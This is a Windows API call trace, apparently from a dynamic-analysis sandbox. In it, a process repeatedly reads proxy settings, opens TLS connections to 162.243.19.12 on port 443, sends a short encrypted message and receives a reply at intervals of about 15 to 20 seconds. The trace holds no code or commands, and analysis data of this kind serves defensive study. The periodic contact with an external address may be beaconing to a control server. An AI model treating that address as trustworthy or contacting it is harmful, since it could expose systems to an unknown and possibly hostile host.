	[0156.699] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0156.699] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0156.699] SetLastError (dwErrCode=0x0) 
	[0156.700] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0156.700] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0156.700] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0156.701] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b499b0, MessageSeqNo=0x0 | out: pMessage=0x2ad23b499b0) returned 0x0
	[0156.701] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9d40
	[0156.701] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9d40*=((len=0x3b, buf=0x2ad23b46c70*), (len=0xd5, buf=0x2ad23b497b8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9d40*=((len=0x3b, buf=0x2ad23b46c70*), (len=0xd5, buf=0x2ad23b497b8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0156.704] CoTaskMemFree (pv=0x2ad3bac9d40) 
	[0156.704] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0156.705] recv (in: s=0x7d0, buf=0x2ad23b49b58, len=5, flags=0 | out: buf=0x2ad23b49b58*) returned 5
	[0157.229] recv (in: s=0x7d0, buf=0x2ad23b49b7d, len=1488, flags=0 | out: buf=0x2ad23b49b7d*) returned 1488
	[0157.230] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b4a260, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b4a260, pfQOP=0x0) returned 0x0
	[0157.232] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0157.232] SetEvent (hEvent=0x6b8) returned 1
	[0157.300] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d0
	[0174.837] CloseHandle (hObject=0x9d0) returned 1
	[0175.210] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0175.211] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9cc) returned 0x0
	[0175.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0175.211] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0175.211] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0175.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0175.211] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0175.212] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9e0) returned 0x0
	[0175.212] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e4
	[0175.212] RegNotifyChangeKeyValue (hKey=0x9e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e4, fAsynchronous=1) returned 0x0
	[0175.212] GetCurrentProcess () returned 0xffffffffffffffff
	[0175.212] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e8) returned 1
	[0175.213] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1a9a0
	[0175.213] WinHttpSetTimeouts (hInternet=0x2ad3bb1a9a0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0175.213] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0175.227] SetEvent (hEvent=0x6b8) returned 1
	[0175.228] select (in: nfds=0, readfds=0x2ad23b69160, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b69160, writefds=0x0, exceptfds=0x0) returned 1
	[0175.228] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0175.230] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0175.230] shutdown (s=0x7d0, how=2) returned 0
	[0175.239] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0175.239] closesocket (s=0x7d0) returned 0
	[0175.240] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0175.241] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9f0
	[0175.241] WSAConnect (in: s=0x7d0, name=0x2ad23b6a8f8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0175.350] closesocket (s=0x9f0) returned 0
	[0175.351] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b678a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b6b180, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b6b180, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0175.352] FreeContextBuffer (in: pvContextBuffer=0x2ad3bae01f0 | out: pvContextBuffer=0x2ad3bae01f0) returned 0x0
	[0175.352] send (in: s=0x7d0, buf=0x2ad23b6b250*, len=333, flags=0 | out: buf=0x2ad23b6b250*) returned 333
	[0175.353] recv (in: s=0x7d0, buf=0x2ad23b6b250, len=5, flags=0 | out: buf=0x2ad23b6b250*) returned 5
	[0175.459] recv (in: s=0x7d0, buf=0x2ad23b6b255, len=49, flags=0 | out: buf=0x2ad23b6b255*) returned 49
	[0175.459] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b678a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b6b490, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b6b4b0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b6b4b0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0175.460] recv (in: s=0x7d0, buf=0x2ad23b6b5a0, len=5, flags=0 | out: buf=0x2ad23b6b5a0*) returned 5
	[0175.460] recv (in: s=0x7d0, buf=0x2ad23b6b5c5, len=1, flags=0 | out: buf=0x2ad23b6b5c5*) returned 1
	[0175.460] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b678a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b6b698, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b6b6b8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b6b6b8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0175.480] recv (in: s=0x7d0, buf=0x2ad23b6b7a8, len=5, flags=0 | out: buf=0x2ad23b6b7a8*) returned 5
	[0175.480] recv (in: s=0x7d0, buf=0x2ad23b6b7cd, len=48, flags=0 | out: buf=0x2ad23b6b7cd*) returned 48
	[0175.480] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b678a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b6b8d0, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b6b8f0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b6b8f0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0175.482] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3560 | out: pvContextBuffer=0x2ad3bad3560) returned 0x0
	[0175.482] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b6ba38 | out: pBuffer=0x2ad23b6ba38) returned 0x0
	[0175.482] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b6ba90 | out: pBuffer=0x2ad23b6ba90) returned 0x0
	[0175.483] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b6baf8 | out: pBuffer=0x2ad23b6baf8) returned 0x0
	[0175.483] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04ad0) returned 0x2ad3bb04ad0
	[0175.483] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0175.484] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb04ad0
	[0175.484] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04ad0) returned 0x2ad3bb04ad0
	[0175.484] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb04ad0) returned 0x0
	[0175.484] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0175.484] CertFreeCertificateContext (pCertContext=0x2ad3bb04ad0) returned 1
	[0175.485] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0175.486] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb04ad0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0175.486] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04ad0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0175.488] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0175.489] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04ad0) returned 0x2ad3bb04ad0
	[0175.490] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0175.491] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0175.491] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0175.491] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0175.491] SetLastError (dwErrCode=0x0) 
	[0175.491] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0175.492] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0175.493] CertFreeCertificateContext (pCertContext=0x2ad3bb04ad0) returned 1
	[0175.493] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b6e700, MessageSeqNo=0x0 | out: pMessage=0x2ad23b6e700) returned 0x0
	[0175.494] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca130
	[0175.494] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23b6b9c0*), (len=0xd5, buf=0x2ad23b6e508*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23b6b9c0*), (len=0xd5, buf=0x2ad23b6e508*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0175.494] CoTaskMemFree (pv=0x2ad3baca130) 
	[0175.494] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0175.494] recv (in: s=0x7d0, buf=0x2ad23b6e8a8, len=5, flags=0 | out: buf=0x2ad23b6e8a8*) returned 5
	[0175.985] recv (in: s=0x7d0, buf=0x2ad23b6e8cd, len=1488, flags=0 | out: buf=0x2ad23b6e8cd*) returned 1488
	[0175.985] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b6efb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b6efb0, pfQOP=0x0) returned 0x0
	[0175.986] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0175.987] SetEvent (hEvent=0x6b8) returned 1
	[0176.063] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0191.068] CloseHandle (hObject=0x388) returned 1
	[0191.321] log (_X=0x2ad23b596f0) returned 0x5cfe0000
	[0191.349] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0191.349] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9cc) returned 0x0
	[0191.349] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0191.350] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0191.350] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0191.350] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0191.350] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0191.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9e0) returned 0x0
	[0191.351] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e4
	[0191.351] RegNotifyChangeKeyValue (hKey=0x9e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e4, fAsynchronous=1) returned 0x0
	[0191.351] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e8) returned 1
	[0191.352] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1b440
	[0191.352] WinHttpSetTimeouts (hInternet=0x2ad3bb1b440, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0191.352] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0191.368] SetEvent (hEvent=0x6b8) returned 1
	[0191.368] select (in: nfds=0, readfds=0x2ad23b769a8, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b769a8, writefds=0x0, exceptfds=0x0) returned 1
	[0191.369] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0191.370] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0191.370] shutdown (s=0x7d0, how=2) returned 0
	[0191.382] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0191.382] closesocket (s=0x7d0) returned 0
	[0191.384] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0191.384] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9f0
	[0191.409] WSAConnect (in: s=0x7d0, name=0x2ad23b78140*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0191.516] closesocket (s=0x9f0) returned 0
	[0191.517] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b750e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b789c8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b789c8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0191.518] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfac0 | out: pvContextBuffer=0x2ad3badfac0) returned 0x0
	[0191.518] send (in: s=0x7d0, buf=0x2ad23b78a98*, len=333, flags=0 | out: buf=0x2ad23b78a98*) returned 333
	[0191.518] recv (in: s=0x7d0, buf=0x2ad23b78a98, len=5, flags=0 | out: buf=0x2ad23b78a98*) returned 5
	[0191.631] recv (in: s=0x7d0, buf=0x2ad23b78a9d, len=49, flags=0 | out: buf=0x2ad23b78a9d*) returned 49
	[0191.631] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b750e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b78cd8, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b78cf8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b78cf8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0191.631] recv (in: s=0x7d0, buf=0x2ad23b78de8, len=5, flags=0 | out: buf=0x2ad23b78de8*) returned 5
	[0191.632] recv (in: s=0x7d0, buf=0x2ad23b78e0d, len=1, flags=0 | out: buf=0x2ad23b78e0d*) returned 1
	[0191.632] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b750e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b78ee0, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b78f00, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b78f00, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0191.632] recv (in: s=0x7d0, buf=0x2ad23b78ff0, len=5, flags=0 | out: buf=0x2ad23b78ff0*) returned 5
	[0191.632] recv (in: s=0x7d0, buf=0x2ad23b79015, len=48, flags=0 | out: buf=0x2ad23b79015*) returned 48
	[0191.632] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b750e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b79118, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b79138, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b79138, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0191.633] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2960 | out: pvContextBuffer=0x2ad3bad2960) returned 0x0
	[0191.633] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b79280 | out: pBuffer=0x2ad23b79280) returned 0x0
	[0191.633] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b792d8 | out: pBuffer=0x2ad23b792d8) returned 0x0
	[0191.634] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b79340 | out: pBuffer=0x2ad23b79340) returned 0x0
	[0191.634] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06650) returned 0x2ad3bb06650
	[0191.634] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0191.634] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb06650
	[0191.635] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06650) returned 0x2ad3bb06650
	[0191.635] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb06650) returned 0x0
	[0191.635] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0191.635] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0191.636] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0191.636] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb06650, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0191.636] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06650, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0191.637] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0191.643] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06650) returned 0x2ad3bb06650
	[0191.643] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0191.644] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0191.644] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0191.644] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0191.644] SetLastError (dwErrCode=0x0) 
	[0191.645] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0191.646] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0191.646] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0191.646] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b7bf48, MessageSeqNo=0x0 | out: pMessage=0x2ad23b7bf48) returned 0x0
	[0191.646] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9dd0
	[0191.647] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9dd0*=((len=0x3b, buf=0x2ad23b79208*), (len=0xd5, buf=0x2ad23b7bd50*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9dd0*=((len=0x3b, buf=0x2ad23b79208*), (len=0xd5, buf=0x2ad23b7bd50*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0191.647] CoTaskMemFree (pv=0x2ad3bac9dd0) 
	[0191.647] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0191.647] recv (in: s=0x7d0, buf=0x2ad23b7c0f0, len=5, flags=0 | out: buf=0x2ad23b7c0f0*) returned 5
	[0192.163] recv (in: s=0x7d0, buf=0x2ad23b7c115, len=1488, flags=0 | out: buf=0x2ad23b7c115*) returned 1488
	[0192.164] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b7c7f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b7c7f8, pfQOP=0x0) returned 0x0
	[0192.165] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0192.165] SetEvent (hEvent=0x6b8) returned 1
	[0192.224] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0213.227] CloseHandle (hObject=0x388) returned 1
	[0213.357] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0213.357] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9cc) returned 0x0
	[0213.357] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0213.357] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0213.357] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0213.357] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0213.357] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0213.357] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9e0) returned 0x0
	[0213.357] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e4
	[0213.357] RegNotifyChangeKeyValue (hKey=0x9e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e4, fAsynchronous=1) returned 0x0
	[0213.357] GetCurrentProcess () returned 0xffffffffffffffff
	[0213.357] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e8) returned 1
